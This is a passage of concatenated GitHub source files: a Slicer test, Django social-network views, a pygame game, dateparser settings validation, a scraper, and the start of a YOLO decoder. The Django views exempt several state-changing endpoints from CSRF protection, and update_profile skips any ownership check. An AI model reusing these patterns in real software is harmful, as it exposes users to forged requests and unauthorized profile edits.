should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n #\n # first, get some data\n #\n import urllib.request\n downloads = (\n ('http://slicer.kitware.com/midas3/download?items=5767', 'FA.nrrd', slicer.util.loadVolume),\n )\n\n for url,name,loader in downloads:\n filePath = slicer.app.temporaryPath + '/' + name\n if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:\n logging.info('Requesting download %s from %s...\\n' % (name, url))\n urllib.request.urlretrieve(url, filePath)\n if loader:\n logging.info('Loading %s...' 
% (name,))\n loader(filePath)\n self.delayDisplay('Finished with download and loading')\n\n volumeNode = slicer.util.getNode(pattern=\"FA\")\n logic = ScrModuleLogic()\n self.assertTrue(logic.isValidModelData(volumeNode))\n self.delayDisplay('Test passed!')\n","repo_name":"chorobabeata/PWP_slicer","sub_path":"ScrModule/ScrModule.py","file_name":"ScrModule.py","file_ext":"py","file_size_in_byte":6948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10991118793","text":"import json\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST, require_GET\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import User, Reply, Follow, Post\n\n\ndef index(request):\n try:\n # Query for all posts\n posts = Post.objects.all()\n # 10 objects per page\n paginator = Paginator(posts, 10)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong.\"\n })\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n for obj in page_obj:\n # user-based unique views count\n if request.user.is_authenticated and request.user not in obj.viewed_by.all():\n try:\n obj.view_count += 1\n obj.viewed_by.add(request.user)\n obj.save()\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong\"\n })\n\n # ! 
after posting, user ends up seeing empty page !\n return render(request, \"network/index.html\", {\n \"page_posts\": page_obj,\n \"posts_liked\": posts_liked\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"network/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"network/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"network/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/register.html\")\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef create_post(request):\n content = request.POST[\"post\"]\n if not content or content.strip() == \"\":\n messages.info(request, \"Must provide content.\")\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n post = Post(content=content, author=request.user)\n post.save()\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef profile_view(request, id):\n owner = User.objects.get(pk=id)\n posts = Post.objects.filter(author_id=id)\n paginator = Paginator(posts, 10)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n # is user following the profile owner\n is_following = owner.followers.filter(follower_id=request.user.id).exists()\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n for obj in page_obj:\n if request.user.is_authenticated and request.user not in obj.viewed_by.all():\n try:\n obj.view_count += 1\n obj.viewed_by.add(request.user)\n obj.save()\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! 
Something went wrong\"\n })\n\n return render(request, \"network/profile.html\", {\n \"posts\": posts,\n \"page_posts\": page_obj,\n \"posts_liked\": posts_liked,\n \"owner\": owner,\n \"is_following\": is_following,\n })\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef follow(request, id):\n user_to_be_followed = User.objects.get(pk=id)\n follow = Follow(user=user_to_be_followed, follower=request.user)\n follow.save()\n return HttpResponseRedirect(reverse(\"profile\", kwargs={\"id\": id}))\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef unfollow(request, id):\n user_to_be_unfollowed = User.objects.get(pk=id)\n follow = Follow.objects.filter(\n user_id=user_to_be_unfollowed.id, follower_id=request.user.id)\n follow.delete()\n return HttpResponseRedirect(reverse(\"profile\", kwargs={\"id\": id}))\n\n\n@login_required(login_url=\"login\")\n@require_GET\ndef following(request):\n user = request.user\n followed_users = user.following.values()\n followed_users_ids = [obj[\"user_id\"] for obj in followed_users]\n posts = Post.objects.filter(author_id__in=followed_users_ids)\n paginator = Paginator(posts, 10)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n for obj in page_obj:\n if request.user.is_authenticated and request.user not in obj.viewed_by.all():\n try:\n obj.view_count += 1\n obj.viewed_by.add(request.user)\n obj.save()\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong\"\n })\n\n return render(request, \"network/following.html\", {\n \"page_posts\": page_obj,\n \"posts_liked\": posts_liked,\n })\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\ndef update_post(request, id):\n # Query for reqeusted post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n if request.method == \"PUT\":\n if post.author == request.user:\n # deserialize json to python object\n data = json.loads(request.body)\n content = data[\"content\"]\n post.content = content\n post.is_updated = True\n post.save()\n return HttpResponse(status=204)\n else:\n return JsonResponse({\n \"error\": \"Not authorized for this action.\"\n })\n else:\n return JsonResponse({\n \"error\": \"Only PUT request allowed.\"\n }, status=400)\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\ndef delete_post(request, id):\n if request.method == \"DELETE\":\n # Query for requested post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n if post.author == request.user:\n post.delete()\n return HttpResponse(status=204)\n else:\n return JsonResponse({\n \"error\": \"Not authorized for this action.\"\n }, status=401)\n # Deletion must be via DELETE\n else:\n return JsonResponse({\n \"error\": \"DELETE request required.\"\n }, status=400)\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\n@require_POST\ndef like(request, id):\n # Query for requested post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n post.liked_by.add(request.user)\n post.save()\n return HttpResponse(status=204)\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\n@require_POST\ndef unlike(request, id):\n # Query for requested post\n try:\n post = Post.objects.get(pk=id)\n except 
Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n post.liked_by.remove(request.user)\n post.save()\n return HttpResponse(status=204)\n\n\n@login_required(login_url=\"login\")\n@require_GET\ndef post_details(request, id):\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return HttpResponseRedirect(reverse(\"index\"))\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n if request.user.is_authenticated and request.user not in post.viewed_by.all():\n try:\n post.view_count += 1\n post.viewed_by.add(request.user)\n post.save()\n except:\n messages.error(request, \"Oops! Something went wrong while updating the view count.\")\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": id}))\n\n replies = Reply.objects.filter(post_id=id)\n return render(request, \"network/post.html\", {\n \"post\": post,\n \"replies\": replies,\n \"posts_liked\": posts_liked,\n })\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef reply(request, id):\n post = Post.objects.get(pk=id)\n try:\n content = request.POST[\"reply\"]\n if not content or content.strip() == \"\":\n messages.info(request, \"Must provide content.\")\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": id}))\n\n reply = Reply(author=request.user, reply=content, post=post)\n reply.save()\n except:\n return render(request, \"network/post.html\", {\n \"message\": \"Oops! Could not post your reply. Try again later.\"\n })\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": id}))\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\n@require_POST\ndef delete_reply(request, id):\n reply = Reply.objects.get(pk=id)\n post_id = reply.post_id\n try:\n reply.delete()\n except:\n return render(request, \"network/post.html\", {\n \"message\": \"Oops! 
Could not delete.\"\n })\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": post_id}))\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\ndef update_profile(request, id):\n user = User.objects.get(pk=id)\n if request.method == \"PUT\":\n # deserialize json to python object\n data = json.loads(request.body)\n bio = data[\"bio\"]\n user.bio = bio\n user.save()\n return HttpResponse(status=204)\n else:\n return JsonResponse({\n \"error\": \"Only PUT request allowed.\"\n }, status=400)\n\n\n# todo: add bookmark feature\n","repo_name":"hakanayata/growler","sub_path":"network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2002927644","text":"def playg100():\r\n import pygame\r\n import random\r\n import pygame.locals\r\n import os\r\n import pickle\r\n import tkinter as tk\r\n pygame.init()\r\n\r\n ################################################ Instructions ########################################################\r\n root = tk.Tk()\r\n T11 = tk.Text(root, height = 20, width = 110)\r\n T11.pack()\r\n T11.insert(tk.END,\"HOW TO PLAY:\\nChoose number of players (2-5) and difficulty level (1-3).\\nThe player selects any number between 1 and 6 to move his/her character those many steps across a particular row of the board.\\nIf the player steps on a 'bomb', which vary as per the difficulty level, are randomly spread across the board and are invisible, he/she moves back 1/2/3/4 steps depending on number of boxes behind the player.\\nIts possible for the player to step on a bomb and go one step back, only to end up on another bomb and hence, go back another step. It can continue that way until the box the player is standing on has no bomb.\\nIf the character is near the end of the row and the number of steps he/she has chosen exceeds the remaining number of boxes on that row, he/she is automatically taken to the first square of the next row, regardless of the number chosen.\\n\\nCONDITIONS TO WIN:\\nThe first player to reach the last square of the last row wins.\")\r\n T11.configure(font = (\"helvetica\",15,\"bold\"))\r\n root.mainloop()\r\n Wi = []\r\n\r\n ####################################### Difficulty, Number of Players ################################################\r\n if os.path.exists(\"Rank.dat\"):\r\n os.remove(\"Rank.dat\")\r\n else:\r\n pass\r\n \r\n def difficulty(diff = 0):\r\n while diff == 0:\r\n diff = int(input(\"Enter difficulty level (1-3): \"))\r\n if 1 <= diff <= 3:\r\n return diff\r\n else:\r\n print(\"Difficulty level between 1 and 5 only.\")\r\n diff = 0\r\n\r\n def playerno(np = 0):\r\n while np == 0:\r\n np = int(input(\"Enter number of players (min 2, max 5): \"))\r\n if 2 <= np <= 5:\r\n return np\r\n else:\r\n print(\"Minimum is 2, maximum is 5. 
Numbers outside this range are not allowed.\")\r\n np = 0\r\n\r\n def board():\r\n screen.fill((255,255,255))\r\n for box1 in range(0,600,120):\r\n for box2 in range(0,600,120):\r\n pygame.draw.rect(screen,(255,0,0),[10+box1,10+box2,60,60])\r\n pygame.draw.rect(screen,(0,255,0),[10+box1,70+box2,60,60])\r\n pygame.draw.rect(screen,(0,255,0),[70+box1,10+box2,60,60])\r\n pygame.draw.rect(screen,(255,0,0),[70+box1,70+box2,60,60])\r\n\r\n ######################################### Creating Screen and Players ###################################################\r\n\r\n screen = pygame.display.set_mode((800,650))\r\n capt = pygame.display.set_caption(\"Get To 100\")\r\n done = True\r\n\r\n P = []\r\n char = []\r\n for i in range(0,playerno(0)):\r\n P.append(input(\"Enter name of player \" + str(i+1) + \":\"))\r\n char.append(pygame.Rect(15,15,50,50))\r\n\r\n O = []\r\n for out in range(0, 20+(10*difficulty(0))):\r\n x11 = 10+random.randrange(65,540,60)\r\n y11 = 10+random.randrange(5,600,60)\r\n O.append(pygame.Rect(x11,y11,50,50))\r\n print()\r\n\r\n ##################################### Game Code #################################################\r\n while done == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = False\r\n\r\n ########################### Inputting Number of Steps ################################# \r\n for i in P:\r\n no = 0\r\n while no == 0:\r\n no = int(input(i+\", enter the number of steps to move forward (1-6): \"))\r\n print()\r\n if (1 <= no <= 6):\r\n if (((no*60)+char[P.index(i)].x) > 555):\r\n if (char[P.index(i)].y == 555):\r\n root = tk.Tk()\r\n T1 = tk.Text(root, height = 3, width = 60)\r\n T1.pack()\r\n T1.insert(tk.END,i+\", you need less than \"+str(no)+\" steps to finish. Unfortunately, as the number chosen is between 1 and 6, your turn is over.\")\r\n T1.configure(font = (\"helvetica\",20,\"bold\"))\r\n root.mainloop()\r\n print()\r\n else:\r\n char[P.index(i)].y += 60\r\n char[P.index(i)].x = 15\r\n print(i,\" is in box \",(((10*((char[P.index(i)].y-15)/60))+((char[P.index(i)].x-15)/60))+1))\r\n else:\r\n char[P.index(i)].x += (no*60)\r\n print(i,\" is in box \",(((10*((char[P.index(i)].y-15)/60))+((char[P.index(i)].x-15)/60))+1))\r\n else:\r\n root = tk.Tk()\r\n T2 = tk.Text(root, height = 2, width = 65)\r\n T2.pack()\r\n T2.insert(tk.END,i+\", the number of steps must be between 1 and 6 only. 
Try again.\")\r\n T2.configure(font = (\"helvetica\",20,\"bold\"))\r\n root.mainloop()\r\n print()\r\n no = 0\r\n\r\n ##################################### Consequences of Stepping on a Bomb #########################################\r\n for out in O:\r\n for cha in char:\r\n if cha.colliderect(out):\r\n if cha.x == 135:\r\n cha.x -= 60\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n elif cha.x == 195:\r\n cha.x -= 120\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n elif cha.x == 255:\r\n cha.x -= 180\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n else:\r\n cha.x -= 240\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n \r\n ##################################### Declaring Winners ##########################################\r\n for cha in char:\r\n if (cha.y > 555) or (cha.x == 555 and cha.y == 555):\r\n Wi.append(P[char.index(cha)])\r\n rank = len(Wi)\r\n root = tk.Tk()\r\n T3 = tk.Text(root, height = 3, width = 50)\r\n T3.pack()\r\n T3.insert(tk.END,P[char.index(cha)]+\" HAS FINISHED THE GAME AND TAKEN RANK NO. \"+str(rank))\r\n T3.configure(font = (\"helvetica\",20,\"bold\"))\r\n root.mainloop()\r\n P.pop(char.index(cha))\r\n char.pop(char.index(cha))\r\n\r\n ################################## Graphics #######################################\r\n board()\r\n if len(char) == 0:\r\n done = False\r\n else:\r\n pass\r\n \r\n for cha in char:\r\n pygame.draw.ellipse(screen,(0,0,255),cha)\r\n pygame.display.flip()\r\n\r\n ########################################## Scoreboard ###############################################\r\n ranks= open('Rank.dat','wb')\r\n pickle.dump(Wi,ranks)\r\n ranks.close()\r\n ranks = open('Rank.dat','rb')\r\n firank = pickle.load(ranks)\r\n root = tk.Tk()\r\n T3 = tk.Text(root, height = 10, width = 40)\r\n T3.pack()\r\n T3.insert(tk.END,\"Rank\\t\\tName\")\r\n T3.configure(font = (\"helvetica\",20,\"bold\"))\r\n for ira in firank:\r\n T3.insert(tk.END,\"\\n\"+str(firank.index(ira)+1)+\"\\t\\t\"+ira)\r\n T3.configure(font = (\"helvetica\",15,\"bold\"))\r\n root.mainloop()\r\n## pygame.quit()\r\n\r\n##playg100()\r\n","repo_name":"Python-is-better-than-Java/Previous-Projects","sub_path":"Grade 11 and 12/Get_To_100.py","file_name":"Get_To_100.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12852133516","text":"import hashlib\nfrom datetime import datetime\nfrom functools import wraps\n\nfrom dateparser.data.languages_info import language_order\n\nfrom .parser import date_order_chart\nfrom .utils import registry\n\n\n@registry\nclass Settings:\n \"\"\"Control and configure default parsing behavior of dateparser.\n Currently, supported settings are:\n\n * `DATE_ORDER`\n * `PREFER_LOCALE_DATE_ORDER`\n * `TIMEZONE`\n * `TO_TIMEZONE`\n * `RETURN_AS_TIMEZONE_AWARE`\n * `PREFER_MONTH_OF_YEAR`\n * `PREFER_DAY_OF_MONTH`\n * `PREFER_DATES_FROM`\n * `RELATIVE_BASE`\n * `STRICT_PARSING`\n * `REQUIRE_PARTS`\n * `SKIP_TOKENS`\n * `NORMALIZE`\n * `RETURN_TIME_AS_PERIOD`\n * `PARSERS`\n * `DEFAULT_LANGUAGES`\n * `LANGUAGE_DETECTION_CONFIDENCE_THRESHOLD`\n * `CACHE_SIZE_LIMIT`\n \"\"\"\n\n _default = True\n 
_pyfile_data = None\n _mod_settings = dict()\n\n def __init__(self, settings=None):\n if settings:\n self._updateall(settings.items())\n else:\n self._updateall(self._get_settings_from_pyfile().items())\n\n @classmethod\n def get_key(cls, settings=None):\n if not settings:\n return \"default\"\n\n keys = sorted([\"%s-%s\" % (key, str(settings[key])) for key in settings])\n return hashlib.md5(\"\".join(keys).encode(\"utf-8\")).hexdigest()\n\n @classmethod\n def _get_settings_from_pyfile(cls):\n if not cls._pyfile_data:\n from dateparser_data import settings\n\n cls._pyfile_data = settings.settings\n return cls._pyfile_data\n\n def _updateall(self, iterable):\n for key, value in iterable:\n setattr(self, key, value)\n\n def replace(self, mod_settings=None, **kwds):\n for k, v in kwds.items():\n if v is None:\n raise TypeError('Invalid {{\"{}\": {}}}'.format(k, v))\n\n for x in self._get_settings_from_pyfile().keys():\n kwds.setdefault(x, getattr(self, x))\n\n kwds[\"_default\"] = False\n if mod_settings:\n kwds[\"_mod_settings\"] = mod_settings\n\n return self.__class__(settings=kwds)\n\n\nsettings = Settings()\n\n\ndef apply_settings(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n mod_settings = kwargs.get(\"settings\")\n kwargs[\"settings\"] = mod_settings or settings\n\n if isinstance(kwargs[\"settings\"], dict):\n kwargs[\"settings\"] = settings.replace(\n mod_settings=mod_settings, **kwargs[\"settings\"]\n )\n\n if not isinstance(kwargs[\"settings\"], Settings):\n raise TypeError(\n \"settings can only be either dict or instance of Settings class\"\n )\n\n return f(*args, **kwargs)\n\n return wrapper\n\n\nclass SettingValidationError(ValueError):\n pass\n\n\ndef _check_repeated_values(setting_name, setting_value):\n if len(setting_value) != len(set(setting_value)):\n raise SettingValidationError(\n 'There are repeated values in the \"{}\" setting'.format(setting_name)\n )\n return\n\n\ndef _check_require_part(setting_name, setting_value):\n \"\"\"Returns `True` if the provided list of parts contains valid values\"\"\"\n invalid_values = set(setting_value) - {\"day\", \"month\", \"year\"}\n if invalid_values:\n raise SettingValidationError(\n '\"{}\" setting contains invalid values: {}'.format(\n setting_name, \", \".join(invalid_values)\n )\n )\n _check_repeated_values(setting_name, setting_value)\n\n\ndef _check_parsers(setting_name, setting_value):\n \"\"\"Returns `True` if the provided list of parsers contains valid values\"\"\"\n existing_parsers = [\n \"timestamp\",\n \"relative-time\",\n \"custom-formats\",\n \"absolute-time\",\n \"no-spaces-time\",\n \"negative-timestamp\",\n ] # FIXME: Extract the list of existing parsers from another place (#798)\n unknown_parsers = set(setting_value) - set(existing_parsers)\n if unknown_parsers:\n raise SettingValidationError(\n 'Found unknown parsers in the \"{}\" setting: {}'.format(\n setting_name, \", \".join(unknown_parsers)\n )\n )\n _check_repeated_values(setting_name, setting_value)\n\n\ndef _check_default_languages(setting_name, setting_value):\n unsupported_languages = set(setting_value) - set(language_order)\n if unsupported_languages:\n raise SettingValidationError(\n \"Found invalid languages in the '{}' setting: {}\".format(\n setting_name, \", \".join(map(repr, unsupported_languages))\n )\n )\n _check_repeated_values(setting_name, setting_value)\n\n\ndef _check_between_0_and_1(setting_name, setting_value):\n is_valid = 0 <= setting_value <= 1\n if not is_valid:\n raise SettingValidationError(\n \"{} is not a valid value for 
{}. It can take values between 0 and \"\n \"1.\".format(\n setting_value,\n setting_name,\n )\n )\n\n\ndef check_settings(settings):\n \"\"\"\n Check that the provided settings are valid; raise `SettingValidationError` if not.\n Only checks the modified settings.\n \"\"\"\n settings_values = {\n \"DATE_ORDER\": {\n \"values\": tuple(date_order_chart.keys()),\n \"type\": str,\n },\n \"TIMEZONE\": {\n # we don't check invalid Timezones as they raise an error\n \"type\": str,\n },\n \"TO_TIMEZONE\": {\n # It defaults to None, but it's not allowed to use it directly\n # \"values\" can take unlimited options\n \"type\": str\n },\n \"RETURN_AS_TIMEZONE_AWARE\": {\n # It defaults to 'default', but it's not allowed to use it directly\n \"type\": bool\n },\n \"PREFER_MONTH_OF_YEAR\": {\"values\": (\"current\", \"first\", \"last\"), \"type\": str},\n \"PREFER_DAY_OF_MONTH\": {\"values\": (\"current\", \"first\", \"last\"), \"type\": str},\n \"PREFER_DATES_FROM\": {\n \"values\": (\"current_period\", \"past\", \"future\"),\n \"type\": str,\n },\n \"RELATIVE_BASE\": {\n # \"values\" can take unlimited options\n \"type\": datetime\n },\n \"STRICT_PARSING\": {\"type\": bool},\n \"REQUIRE_PARTS\": {\n # \"values\" covered by the 'extra_check'\n \"type\": list,\n \"extra_check\": _check_require_part,\n },\n \"SKIP_TOKENS\": {\n # \"values\" can take unlimited options\n \"type\": list,\n },\n \"NORMALIZE\": {\"type\": bool},\n \"RETURN_TIME_AS_PERIOD\": {\"type\": bool},\n \"PARSERS\": {\n # \"values\" covered by the 'extra_check'\n \"type\": list,\n \"extra_check\": _check_parsers,\n },\n \"FUZZY\": {\"type\": bool},\n \"PREFER_LOCALE_DATE_ORDER\": {\"type\": bool},\n \"DEFAULT_LANGUAGES\": {\"type\": list, \"extra_check\": _check_default_languages},\n \"LANGUAGE_DETECTION_CONFIDENCE_THRESHOLD\": {\n \"type\": float,\n \"extra_check\": _check_between_0_and_1,\n },\n \"CACHE_SIZE_LIMIT\": {\n \"type\": int,\n },\n }\n\n modified_settings = settings._mod_settings # check only modified settings\n\n # check settings keys:\n for setting in modified_settings:\n if setting not in settings_values:\n raise SettingValidationError('\"{}\" is not a valid setting'.format(setting))\n\n for setting_name, setting_value in modified_settings.items():\n setting_type = type(setting_value)\n setting_props = settings_values[setting_name]\n\n # check type:\n if setting_type != setting_props[\"type\"]:\n raise SettingValidationError(\n '\"{}\" must be \"{}\", not \"{}\".'.format(\n setting_name, setting_props[\"type\"].__name__, setting_type.__name__\n )\n )\n\n # check values:\n if setting_props.get(\"values\") and setting_value not in setting_props[\"values\"]:\n raise SettingValidationError(\n '\"{}\" is not a valid value for \"{}\", it should be: \"{}\" or \"{}\"'.format(\n setting_value,\n setting_name,\n '\", \"'.join(setting_props[\"values\"][:-1]),\n setting_props[\"values\"][-1],\n )\n )\n\n # specific checks\n extra_check = setting_props.get(\"extra_check\")\n if extra_check:\n extra_check(setting_name, setting_value)\n","repo_name":"scrapinghub/dateparser","sub_path":"dateparser/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":2374,"dataset":"github-code","pt":"79"} +{"seq_id":"11000999332","text":"import requests\nfrom pyquery import PyQuery as pq\nimport redis\n\nurl = \"https://book.douban.com/tag/?view=type&icn=index-sorttags-all\"\n# fetch the tags page\nres = requests.get(url)\n# decode the response content\ndata = res.content.decode('utf-8')\n# 
parse the response with pyquery\ndoc = pq(data)\n# connect to the Redis database\nr = redis.Redis(host=\"localhost\",port=\"6379\",decode_responses=True)\n\n# get all <a> tags that contain tag links\nalist = doc(\"table.tagCol td a\")\n\nfor i in alist.items():\n\t'''\n\tIterate over the tags and push them into the Redis database\n\t'''\n\ttag = i.attr.href\n\tr.lpush(\"books:tag_urls\",tag)\n\nprint(\"There are %d tags in total\" % len(alist))\n\n","repo_name":"zwq-qianyu/douban_books","sub_path":"tag_urls.py","file_name":"tag_urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"71160654014","text":"import argparse\n\n\nfrom Parser.Shutterstock_parser import get_images\nfrom Database.database_creator import creator\nfrom Database.database_operations import add_photo, get_photos\n\n\ndef main(params):\n download_data = params['download_data']\n number_of_images = params['number_of_images']\n section = params['section']\n folder = params['folder']\n get_data = params['get_data']\n\n if download_data:\n creator()\n pictures = get_images(number_of_images, section, folder)\n for pic in pictures:\n add_photo(pic[0], pic[1])\n if get_data:\n pictures = get_photos()\n return pictures\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--number_of_images', default=10, type=int, help='number of images to download')\n parser.add_argument('-s', '--section', default='', type=str, help='type of pictures to search for')\n parser.add_argument('-f', '--folder', default='', type=str, help='folder where to download')\n parser.add_argument('-g', '--get_data', default=False, type=bool,\n help='return data from database or no(False/True)')\n parser.add_argument('-d', '--download_data', default=True, type=bool,\n help='put data into database or no(False/True)')\n args = parser.parse_args()\n params = vars(args)\n main(params)\n","repo_name":"arsentim45/Image_captioning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2391587013","text":"import datetime\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef open_lib_and_creat_dict(myfile):\n try:\n print(datetime.datetime.now())\n now = datetime.datetime.now()\n file = open(myfile)\n yield file\n finally:\n file.close()\n print(datetime.datetime.now())\n then = datetime.datetime.now()\n delta = then - now\n print(delta.microseconds)\n\ndef get_shop_list_by_dishes(menu, dishes, person_count):\n ee = {}\n for name in dishes:\n for ingridient in menu[name.strip()]:\n # ingridient = dict[name]\n # print(ingridient)\n if ingridient['ingridient_name'] in ee.keys():\n ee[ingridient['ingridient_name']]['quantity'] += ingridient['quantity'] * person_count\n else:\n ee[ingridient['ingridient_name']] = {\n 'measure': ingridient['measure'],\n 'quantity': ingridient['quantity'] * person_count\n }\n return ee\n\ndef read_you_cbook(name_of_file):\n menu = {}\n with open_lib_and_creat_dict(name_of_file) as f:\n while True:\n title = f.readline().strip()\n # print(type(line))\n if not title:\n break\n menu[title] = []\n num = f.readline()\n n = int(num)\n\n for i in range(n):\n [ingridient_name, quantity, measure] = f.readline().split('|')\n menu[title].append({\n 'ingridient_name': ingridient_name.strip(),\n 'quantity': int(quantity.strip()),\n 'measure': measure.strip()\n })\n\n f.readline()\n\n return menu\n\n\ndef main():\n now = datetime.datetime.now()\n menu = read_you_cbook('cookbook')\n\n names = input('Enter dish names, comma-separated: ').split(',')\n number = int(input('Enter the number of guests: '))\n print(menu)\n\n shop = get_shop_list_by_dishes(menu, names, number)\n print(shop)\n print(datetime.datetime.now())\n then = datetime.datetime.now()\n delta = then - now\n print(delta.microseconds)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sepetytimur/maneger_contecsta","sub_path":"maneger1.py","file_name":"maneger1.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26819880118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 7 01:27:40 2020\n\n@author: maniac\n\"\"\"\n\nfrom hyper_parameters import OBJECTNESS_THREHOLD,GRID_DIM,NUM_ANCHOR,\\\nIMAGE_H,IMAGE_W,NUM_CLASSES,get_dictionaries\nimport tensorflow as tf\nANCHORS = tf.constant([[0.4,0.2],[0.3,0.3],[0.2,0.4]])\nidx2cat,cat2idx = get_dictionaries()\n\nimport cv2\nimport numpy as np\n\n# input is a single prediction y\n# output is a boxes tensor and a class-ID list\ndef decode_yolo_output(y):\n\n # THIS FUNCTION works for SIG(TX),SIG(TY) values in y, NOT TX,TY\n\n objectness= tf.reshape(tf.cast( y[...,0] >OBJECTNESS_THREHOLD ,tf.int32),[-1])\n boxes_loc = tf.where(objectness)\n no_ofBoxes = tf.shape(boxes_loc)[0]\n\n \n index = tf.cast(boxes_loc/NUM_ANCHOR,tf.int64)\n # index holds the indices of grid cells that contain an object\n \n anchor_index = boxes_loc%NUM_ANCHOR\n Num_y = tf.cast(index/GRID_DIM,tf.int32)\n Num_x = index%GRID_DIM \n\n sig_tx= tf.gather( tf.reshape(y[...,1],[-1]) , boxes_loc)\n sig_ty= tf.gather( tf.reshape(y[...,2],[-1]) , boxes_loc)\n tw= tf.gather( tf.reshape(y[...,3],[-1]) , boxes_loc)\n th= tf.gather( tf.reshape(y[...,4],[-1]) , boxes_loc)\n \n \n Factor_x = tf.math.divide(IMAGE_W,GRID_DIM)\n Factor_y = tf.math.divide(IMAGE_H,GRID_DIM)\n \n #in pixels\n centre_x= Factor_x*(tf.cast(Num_x,tf.float32) + sig_tx) \n centre_y= Factor_y*(tf.cast(Num_y,tf.float32) + sig_ty)\n centre_x = tf.squeeze(centre_x)\n centre_y = 